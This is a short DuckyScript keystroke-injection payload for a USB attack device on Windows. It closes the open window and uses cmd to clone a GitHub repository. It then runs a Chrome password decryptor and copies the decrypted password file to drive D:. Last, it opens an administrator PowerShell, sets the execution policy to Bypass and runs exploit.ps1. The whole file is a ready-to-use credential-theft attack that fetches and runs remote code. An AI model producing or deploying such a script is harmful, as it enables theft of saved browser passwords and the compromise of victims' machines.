DELAY 5000
ALT F4


DELAY 1000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000

STRING cd ~
ENTER
DELAY 500
STRING git clone https://github.com/trickytoy/google-password-decrypt-exe.git
ENTER
DELAY 5000
STRING cd google-password-decrypt-exe
ENTER
DELAY 500
STRING start .\decrypt_chrome_password.exe
ENTER
DELAY 5000
STRING copy .\decrypted_password.csv D:
ENTER
DELAY 8000
ALT F4
DELAY 500

GUI x
DELAY 500
STRING a
DELAY 1000
LEFT_ARROW
DELAY 500
ENTER

DELAY 2000
STRINGL Get-ExecutionPolicy -List
ENTER
DELAY 500
STRINGL Set-ExecutionPolicy Bypass
ENTER
DELAY 500
STRINGL Get-ExecutionPolicy -List
ENTER
DELAY 500
STRINGL D:
ENTER
DELAY 500
STRING .\exploit.ps1
ENTER
